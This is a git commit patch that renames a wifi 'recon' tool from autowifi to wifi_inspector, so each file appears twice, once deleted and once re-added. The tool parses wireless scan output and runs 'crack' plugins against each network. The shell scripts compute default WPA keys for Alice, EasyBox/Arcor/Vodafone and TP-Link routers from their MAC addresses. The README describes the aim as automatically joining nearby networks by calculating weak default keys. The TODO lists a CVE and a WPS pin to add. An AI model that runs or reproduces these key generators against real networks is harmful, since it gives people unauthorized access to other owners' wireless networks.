From 3a7a49b9bda4b2df849db827c61aa347a68a96be Mon Sep 17 00:00:00 2001 From: lassulus Date: Mon, 22 Dec 2014 20:09:43 +0100 Subject: wifi_inspector > autowifi (better name anyuway) --- recon/autowifi/.gitignore | 1 - recon/autowifi/README.md | 49 --------------------- recon/autowifi/TODO | 9 ---- recon/autowifi/inspector_wifi | 75 -------------------------------- recon/autowifi/plugins/01open | 6 --- recon/autowifi/plugins/02alice | 20 --------- recon/autowifi/plugins/02easybox | 37 ---------------- recon/autowifi/plugins/02tplink | 17 -------- recon/autowifi/plugins/plugin_core | 41 ----------------- recon/wifi_inspector/.gitignore | 1 + recon/wifi_inspector/README.md | 49 +++++++++++++++++++++ recon/wifi_inspector/TODO | 9 ++++ recon/wifi_inspector/inspector_wifi | 75 ++++++++++++++++++++++++++++++++ recon/wifi_inspector/plugins/01open | 6 +++ recon/wifi_inspector/plugins/02alice | 20 +++++++++ recon/wifi_inspector/plugins/02easybox | 37 ++++++++++++++++ recon/wifi_inspector/plugins/02tplink | 17 ++++++++ recon/wifi_inspector/plugins/plugin_core | 41 +++++++++++++++++ 18 files changed, 255 insertions(+), 255 deletions(-) delete mode 100644 recon/autowifi/.gitignore delete mode 100644 recon/autowifi/README.md delete mode 100644 recon/autowifi/TODO delete mode 100755 recon/autowifi/inspector_wifi delete mode 100755 recon/autowifi/plugins/01open delete mode 100755 recon/autowifi/plugins/02alice delete mode 100755 recon/autowifi/plugins/02easybox delete mode 100755 recon/autowifi/plugins/02tplink delete mode 100644 recon/autowifi/plugins/plugin_core create mode 100644 recon/wifi_inspector/.gitignore create mode 100644 recon/wifi_inspector/README.md create mode 100644 recon/wifi_inspector/TODO create mode 100755 recon/wifi_inspector/inspector_wifi create mode 100755 recon/wifi_inspector/plugins/01open create mode 100755 recon/wifi_inspector/plugins/02alice create mode 100755 recon/wifi_inspector/plugins/02easybox create mode 100755 recon/wifi_inspector/plugins/02tplink create mode 100644 recon/wifi_inspector/plugins/plugin_core (limited to 'recon') diff --git a/recon/autowifi/.gitignore b/recon/autowifi/.gitignore deleted file mode 100644 index 05ba1603..00000000 --- a/recon/autowifi/.gitignore +++ /dev/null @@ -1 +0,0 @@ -/etc/autowifi/wifi_keys diff --git a/recon/autowifi/README.md b/recon/autowifi/README.md deleted file mode 100644 index 3e0d8dce..00000000 --- a/recon/autowifi/README.md +++ /dev/null @@ -1,49 +0,0 @@ -# Autowifi -Author: makefu,lassulus - -Status: Pre-Alpha - it will most likely break if you try to use it - -# Contact - -twitter: @krebsbob ,@makefoo - -IRC: freenode #krebs - -# Goals -Goal of autowifi is to provide a tool which automatically can connect to -networks in an unknown environment. - -This can either be done by connecting to open networks, known networks -(whitelist) or by calculating weak default wpa keys (for example easybox -default passwords). - -# Audience -Due to the current status of the project the target audience are -linux users with technical background . - -# Usage - - # all as root - # try to find networks to connect to around you - usr/bin/autowifi_dryrun quiet - - # start the autowifi daemon which tries to stay in networks all the time - usr/bin/autowifi - -# Plugins -All tests to open up networks are implemented in plugins in - usr/lib/autowifi/plugins - -## Run a single Plugin -This can be used for testing purposes, e.g. test a single plugin against given networks directly - - # try out the easybox keygen - usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) - - #e.g. - usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" - -# Disclaimer -- use at own risk -- only run in lab environment -- you break it, you buy it diff --git a/recon/autowifi/TODO b/recon/autowifi/TODO deleted file mode 100644 index ddd59818..00000000 --- a/recon/autowifi/TODO +++ /dev/null @@ -1,9 +0,0 @@ -more intelligent autoconnect (open first, encrypted second etc.) - perform initial scan on startup of unscanned networks - sort networks by bandwidth and connect -profiles ala netcfg/netctl -better profile hooks - -Implement: - - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622 - - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt diff --git a/recon/autowifi/inspector_wifi b/recon/autowifi/inspector_wifi deleted file mode 100755 index 06f37ddb..00000000 --- a/recon/autowifi/inspector_wifi +++ /dev/null @@ -1,75 +0,0 @@ -#!/bin/sh -# Usage; sudo iwlist wlan0 scan | ./inspector_wifi -# -# -set -eu - -cd "$(dirname "$(readlink -f "$0")")" -echo "waiting for iwlist scan data..." >&2 - -crack_wifi(){ - for i in plugins/*;do - if RET=$(./$i "$@" 2>/dev/null);then - echo "$@ - with crack $i succeeded - Key is $RET" - fi - done -} - -shell_escape(){ - sed 's/./\\&/g' -} -remove_quotes(){ - sed 's/^"\|"$//g' -} - - -iwlist_scan_parser(){ - count=0 - while read line; - do - case "$line" in - - *"Cell "*) - if [ $count -ne 0 ];then - crack_wifi "$ESSID" $MAC $CHANNEL any_encryption - fi - WPA=0 - WPA2=0 - : $((count+=1)) - MAC=${line#*Address: } - ;; - *Channel:*) - CHANNEL=${line#*:} - ;; - *Quality=*) - QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" - ;; - *"Encryption key:"*) - ENCRYPTION=${line#*key:} - ;; - *ESSID:*) - ESSID=$(echo "${line#*ESSID:}" | remove_quotes) - ;; - *"IE: IEEE 802.11i/WPA2"*) - WPA2=1 - ;; - *"IE: WPA Version 1"*) - WPA=1 - ;; - *);; #important, do not delete! - esac - done; - crack_wifi "$ESSID" $MAC $CHANNEL any_encryption - echo WIFI_COUNT=$count -} - -wifi_init(){ - iwlist_scan_parser -} - -loop_networks(){ - for i in `seq 1 $WIFI_COUNT`; do - loop_over_cracks "$i" - done -} -wifi_init diff --git a/recon/autowifi/plugins/01open b/recon/autowifi/plugins/01open deleted file mode 100755 index 881f47ea..00000000 --- a/recon/autowifi/plugins/01open +++ /dev/null @@ -1,6 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION -if [ "$4" == "[ESS]" ]; then - exit 0 -fi -exit 1 diff --git a/recon/autowifi/plugins/02alice b/recon/autowifi/plugins/02alice deleted file mode 100755 index 65ab34b1..00000000 --- a/recon/autowifi/plugins/02alice +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/sh -# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: -# Based on Poc from -# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html -# -# -# ESSID MAC CHANNEL ENCRYPTION - -cd $(dirname $(readlink -f $0)) -. ./plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 - -# printf always makes string to lower, need that for correct md5sum -ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) -TMP=$(printf $ETHMAC | md5sum) -printf ${TMP:0:12} | base64 -exit 0 diff --git a/recon/autowifi/plugins/02easybox b/recon/autowifi/plugins/02easybox deleted file mode 100755 index 3bb1ee86..00000000 --- a/recon/autowifi/plugins/02easybox +++ /dev/null @@ -1,37 +0,0 @@ -#!/bin/sh -#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 - -cd $(dirname $(readlink -f $0)) -. ./plugin_core -parse_plugin_args "$@" - -if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then - echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" - exit 1 -else - - # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') - # - # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:8:4} | sed 's/./& /g') - #echo 'M4 (Hex): ' ${hexi[@]} - # K1 = last byte of (d0 + d1 + h2 + h3) - # K2 = last byte of (h0 + h1 + d2 + d3) - c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) - c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) - K1=$((($c1)%16)) - K2=$((($c2)%16)) - #printf "K1: %x\n" $K1 - #printf "K2: %x\n" $K2 - X1=$((K1^${deci:6:1})) - X2=$((K1^${deci:4:1})) - X3=$((K1^${deci:2:1})) - Y1=$((K2^0x${hexi:2:1})) - Y2=$((K2^0x${hexi:4:1})) - Y3=$((K2^0x${hexi:6:1})) - Z1=$((0x${hexi:4:1}^${deci:6:1})) - Z2=$((0x${hexi:6:1}^${deci:4:1})) - Z3=$((K1^K2)) - printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F -fi diff --git a/recon/autowifi/plugins/02tplink b/recon/autowifi/plugins/02tplink deleted file mode 100755 index 751ec209..00000000 --- a/recon/autowifi/plugins/02tplink +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/sh -# Implementation of TP-Link default WPA Key -# Based on -# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 - -cd $(dirname $(readlink -f $0)) -. ./plugin_core - -parse_plugin_args "$@" - -! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1 -! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1 - - -# printf always makes string to lower, need that for correct md5sum -printf ${MAC:4:12} -exit 0 diff --git a/recon/autowifi/plugins/plugin_core b/recon/autowifi/plugins/plugin_core deleted file mode 100644 index e79a3c05..00000000 --- a/recon/autowifi/plugins/plugin_core +++ /dev/null @@ -1,41 +0,0 @@ -#!/bin/sh -parse_plugin_args(){ - [ $# -ne 4 ] && plugin_usage && exit 1 - # convenience function to put args in ENV variables - ESSID="$1" - - # mac is returned without colon - MAC=$(printf "%s" "$2" | sed 's/://g') - # split up the mac address to vendor and private part - VENDOR_MAC=${MAC:0:6} - PRIVATE_MAC=${MAC:6:12} - CHANNEL="$3" - ENC="$4" - if [ ${#MAC} -ne 12 ] ;then - echo "MAC malformed" - exit 1 - fi -} -plugin_usage(){ - cat << EOF -usage: $0 ESSID MAC CHANNEL ENC" - - ESSID - string - MAC - 00:11:22:33:44:55 - CHANNEL - 4 - ENC - wpa -EOF - -} - -check_vendor_mac(){ - needle="$(printf $1 | tr '[A-Z]' '[a-z]')" - shift - for i in "$@";do - [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 - done - return 1 -} -check_painmode(){ - test -z "${painmode:-}" && echo "painmode required" && exit 1 -} diff --git a/recon/wifi_inspector/.gitignore b/recon/wifi_inspector/.gitignore new file mode 100644 index 00000000..05ba1603 --- /dev/null +++ b/recon/wifi_inspector/.gitignore @@ -0,0 +1 @@ +/etc/autowifi/wifi_keys diff --git a/recon/wifi_inspector/README.md b/recon/wifi_inspector/README.md new file mode 100644 index 00000000..3e0d8dce --- /dev/null +++ b/recon/wifi_inspector/README.md @@ -0,0 +1,49 @@ +# Autowifi +Author: makefu,lassulus + +Status: Pre-Alpha - it will most likely break if you try to use it + +# Contact + +twitter: @krebsbob ,@makefoo + +IRC: freenode #krebs + +# Goals +Goal of autowifi is to provide a tool which automatically can connect to +networks in an unknown environment. + +This can either be done by connecting to open networks, known networks +(whitelist) or by calculating weak default wpa keys (for example easybox +default passwords). + +# Audience +Due to the current status of the project the target audience are +linux users with technical background . + +# Usage + + # all as root + # try to find networks to connect to around you + usr/bin/autowifi_dryrun quiet + + # start the autowifi daemon which tries to stay in networks all the time + usr/bin/autowifi + +# Plugins +All tests to open up networks are implemented in plugins in + usr/lib/autowifi/plugins + +## Run a single Plugin +This can be used for testing purposes, e.g. test a single plugin against given networks directly + + # try out the easybox keygen + usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) + + #e.g. + usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" + +# Disclaimer +- use at own risk +- only run in lab environment +- you break it, you buy it diff --git a/recon/wifi_inspector/TODO b/recon/wifi_inspector/TODO new file mode 100644 index 00000000..ddd59818 --- /dev/null +++ b/recon/wifi_inspector/TODO @@ -0,0 +1,9 @@ +more intelligent autoconnect (open first, encrypted second etc.) + perform initial scan on startup of unscanned networks + sort networks by bandwidth and connect +profiles ala netcfg/netctl +better profile hooks + +Implement: + - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622 + - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt diff --git a/recon/wifi_inspector/inspector_wifi b/recon/wifi_inspector/inspector_wifi new file mode 100755 index 00000000..06f37ddb --- /dev/null +++ b/recon/wifi_inspector/inspector_wifi @@ -0,0 +1,75 @@ +#!/bin/sh +# Usage; sudo iwlist wlan0 scan | ./inspector_wifi +# +# +set -eu + +cd "$(dirname "$(readlink -f "$0")")" +echo "waiting for iwlist scan data..." >&2 + +crack_wifi(){ + for i in plugins/*;do + if RET=$(./$i "$@" 2>/dev/null);then + echo "$@ - with crack $i succeeded - Key is $RET" + fi + done +} + +shell_escape(){ + sed 's/./\\&/g' +} +remove_quotes(){ + sed 's/^"\|"$//g' +} + + +iwlist_scan_parser(){ + count=0 + while read line; + do + case "$line" in + + *"Cell "*) + if [ $count -ne 0 ];then + crack_wifi "$ESSID" $MAC $CHANNEL any_encryption + fi + WPA=0 + WPA2=0 + : $((count+=1)) + MAC=${line#*Address: } + ;; + *Channel:*) + CHANNEL=${line#*:} + ;; + *Quality=*) + QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" + ;; + *"Encryption key:"*) + ENCRYPTION=${line#*key:} + ;; + *ESSID:*) + ESSID=$(echo "${line#*ESSID:}" | remove_quotes) + ;; + *"IE: IEEE 802.11i/WPA2"*) + WPA2=1 + ;; + *"IE: WPA Version 1"*) + WPA=1 + ;; + *);; #important, do not delete! + esac + done; + crack_wifi "$ESSID" $MAC $CHANNEL any_encryption + echo WIFI_COUNT=$count +} + +wifi_init(){ + iwlist_scan_parser +} + +loop_networks(){ + for i in `seq 1 $WIFI_COUNT`; do + loop_over_cracks "$i" + done +} +wifi_init diff --git a/recon/wifi_inspector/plugins/01open b/recon/wifi_inspector/plugins/01open new file mode 100755 index 00000000..881f47ea --- /dev/null +++ b/recon/wifi_inspector/plugins/01open @@ -0,0 +1,6 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION +if [ "$4" == "[ESS]" ]; then + exit 0 +fi +exit 1 diff --git a/recon/wifi_inspector/plugins/02alice b/recon/wifi_inspector/plugins/02alice new file mode 100755 index 00000000..65ab34b1 --- /dev/null +++ b/recon/wifi_inspector/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ./plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 diff --git a/recon/wifi_inspector/plugins/02easybox b/recon/wifi_inspector/plugins/02easybox new file mode 100755 index 00000000..3bb1ee86 --- /dev/null +++ b/recon/wifi_inspector/plugins/02easybox @@ -0,0 +1,37 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 + +cd $(dirname $(readlink -f $0)) +. ./plugin_core +parse_plugin_args "$@" + +if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then + echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" + exit 1 +else + + # Fill up to 4 places with zeros, if necessary: + deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') + # + # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: + hexi=$(echo ${MAC:8:4} | sed 's/./& /g') + #echo 'M4 (Hex): ' ${hexi[@]} + # K1 = last byte of (d0 + d1 + h2 + h3) + # K2 = last byte of (h0 + h1 + d2 + d3) + c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) + c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) + K1=$((($c1)%16)) + K2=$((($c2)%16)) + #printf "K1: %x\n" $K1 + #printf "K2: %x\n" $K2 + X1=$((K1^${deci:6:1})) + X2=$((K1^${deci:4:1})) + X3=$((K1^${deci:2:1})) + Y1=$((K2^0x${hexi:2:1})) + Y2=$((K2^0x${hexi:4:1})) + Y3=$((K2^0x${hexi:6:1})) + Z1=$((0x${hexi:4:1}^${deci:6:1})) + Z2=$((0x${hexi:6:1}^${deci:4:1})) + Z3=$((K1^K2)) + printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F +fi diff --git a/recon/wifi_inspector/plugins/02tplink b/recon/wifi_inspector/plugins/02tplink new file mode 100755 index 00000000..751ec209 --- /dev/null +++ b/recon/wifi_inspector/plugins/02tplink @@ -0,0 +1,17 @@ +#!/bin/sh +# Implementation of TP-Link default WPA Key +# Based on +# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 + +cd $(dirname $(readlink -f $0)) +. ./plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1 +! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1 + + +# printf always makes string to lower, need that for correct md5sum +printf ${MAC:4:12} +exit 0 diff --git a/recon/wifi_inspector/plugins/plugin_core b/recon/wifi_inspector/plugins/plugin_core new file mode 100644 index 00000000..e79a3c05 --- /dev/null +++ b/recon/wifi_inspector/plugins/plugin_core @@ -0,0 +1,41 @@ +#!/bin/sh +parse_plugin_args(){ + [ $# -ne 4 ] && plugin_usage && exit 1 + # convenience function to put args in ENV variables + ESSID="$1" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} + CHANNEL="$3" + ENC="$4" + if [ ${#MAC} -ne 12 ] ;then + echo "MAC malformed" + exit 1 + fi +} +plugin_usage(){ + cat << EOF +usage: $0 ESSID MAC CHANNEL ENC" + + ESSID - string + MAC - 00:11:22:33:44:55 + CHANNEL - 4 + ENC - wpa +EOF + +} + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} +check_painmode(){ + test -z "${painmode:-}" && echo "painmode required" && exit 1 +} -- cgit v1.2.3